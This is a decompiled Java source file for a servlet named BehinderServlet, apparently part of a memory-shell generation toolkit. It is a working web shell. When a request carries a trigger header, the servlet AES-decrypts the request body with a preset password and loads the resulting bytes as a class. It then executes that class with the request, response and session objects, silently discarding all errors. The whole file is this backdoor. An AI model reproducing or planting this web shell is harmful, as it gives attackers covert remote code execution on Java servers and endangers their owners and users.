package com.reajason.javaweb.memshell.shelltool.behinder;

import java.io.IOException;
import java.lang.reflect.Field;
import java.util.HashMap;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.Servlet;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

/* loaded from: input_file:com/reajason/javaweb/memshell/shelltool/behinder/BehinderServlet.class */
public class BehinderServlet extends ClassLoader implements Servlet {
    public static String pass;
    public static String headerName;
    public static String headerValue;

    public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
        HttpServletRequest httpServletRequest = (HttpServletRequest) servletRequest;
        HttpServletResponse httpServletResponse = (HttpServletResponse) servletResponse;
        try {
            if (httpServletRequest.getHeader(headerName) != null && httpServletRequest.getHeader(headerName).contains(headerValue)) {
                HttpSession session = httpServletRequest.getSession();
                HashMap hashMap = new HashMap(3);
                hashMap.put("request", httpServletRequest);
                hashMap.put("response", getInternalResponse(httpServletResponse));
                hashMap.put("session", session);
                session.setAttribute("u", pass);
                Cipher cipher = Cipher.getInstance("AES");
                cipher.init(2, new SecretKeySpec(pass.getBytes(), "AES"));
                new BehinderServlet(getClass().getClassLoader()).g(cipher.doFinal(base64Decode(servletRequest.getReader().readLine()))).newInstance().equals(hashMap);
            }
        } catch (Exception e) {
        }
    }

    public HttpServletResponse getInternalResponse(HttpServletResponse httpServletResponse) {
        while (true) {
            try {
                httpServletResponse = (HttpServletResponse) getFieldValue(httpServletResponse, "response");
            } catch (Exception e) {
                return httpServletResponse;
            }
        }
    }

    public static Object getFieldValue(Object obj, String str) throws Exception {
        Field field = null;
        Class<?> cls = obj.getClass();
        while (true) {
            Class<?> cls2 = cls;
            if (cls2 == Object.class) {
                break;
            }
            try {
                field = cls2.getDeclaredField(str);
                break;
            } catch (NoSuchFieldException e) {
                cls = cls2.getSuperclass();
            }
        }
        if (field == null) {
            throw new NoSuchFieldException(str);
        }
        field.setAccessible(true);
        return field.get(obj);
    }

    public String getServletInfo() {
        return "";
    }

    public void destroy() {
    }

    public BehinderServlet() {
    }

    public BehinderServlet(ClassLoader classLoader) {
        super(classLoader);
    }

    public Class<?> g(byte[] bArr) {
        return super.defineClass(bArr, 0, bArr.length);
    }

    public static byte[] base64Decode(String str) {
        byte[] bArr = null;
        try {
            Class<?> cls = Class.forName("java.util.Base64");
            Object invoke = cls.getMethod("getDecoder", (Class[]) null).invoke(cls, (Object[]) null);
            bArr = (byte[]) invoke.getClass().getMethod("decode", String.class).invoke(invoke, str);
        } catch (Exception e) {
            try {
                Object newInstance = Class.forName("sun.misc.BASE64Decoder").newInstance();
                bArr = (byte[]) newInstance.getClass().getMethod("decodeBuffer", String.class).invoke(newInstance, str);
            } catch (Exception e2) {
            }
        }
        return bArr;
    }

    public void init(ServletConfig servletConfig) throws ServletException {
    }

    public ServletConfig getServletConfig() {
        return null;
    }
}
